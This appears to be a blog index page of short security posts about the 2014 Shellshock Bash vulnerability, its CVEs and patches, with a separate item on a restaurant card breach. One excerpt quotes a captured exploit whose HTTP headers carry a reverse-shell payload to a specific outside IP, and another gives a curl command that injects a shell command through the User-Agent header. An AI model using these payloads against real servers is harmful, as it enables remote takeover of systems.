Another Hacker shows how to hack Bash Shellcode

Google Web Cache of the exploit char *request = “GET %s HTTP/1.0\r\nUser-Agent: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nCookie: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\nHost: %s\r\nReferer: () { :; }; /bin/bash -i >& /dev/tcp/199.175.52.92/2221 0>&1\r\n\r\n”;   which as it is explained in the link (by the hacker) is to run a … Read more

RedHat still vulnerable to Bash shellcode

RedHat customer portal Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169. This issue (CVE 2014-6271) has not been resolved on RedHat Operating systems (i.e. no … Read more

Other bash shell tests – remote tests

Use commands to test remote sites: curl -A “() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id” $URL   I did it to my website (www.fixvirus.com)   obviously use the test website instead of $URL.   Contact Me as i develop more tests for remote bash exploit tests… With us to get more information that is topical like this.

Bash Shellcode is now at 6 CVE vulnerabilities

This Shellshock issue has now spawned 6 CVE’s  CVE = Common Vulnerabilities and Exposures   Threat level Yellow at Internet Storm Center This is a complex vulnerability first CVE got patched almost immediately  CVE-2014-6271 The second CVE now has a patch as of Friday).  CVE-2014-7169 The 3rd and 4th CVE  CVE-2014-7186, CVE-2014-7187   not patched … Read more

Some Restaurant software is unsafe for credit cards

Signature Systems Inc  based out of Newtown, PA sent out press release If you see your restaurant has PDQ software then you should likely reset your credit cards: Joanie’s – St. Louis, MO 6/19/2014 7:29 AM 8/1/2014 10:52 PM Joe’s Pizza – Greenville, IL 6/19/2014 8:05 AM 8/1/2014 11:59 PM Joe’s Pizza and Pasta – … Read more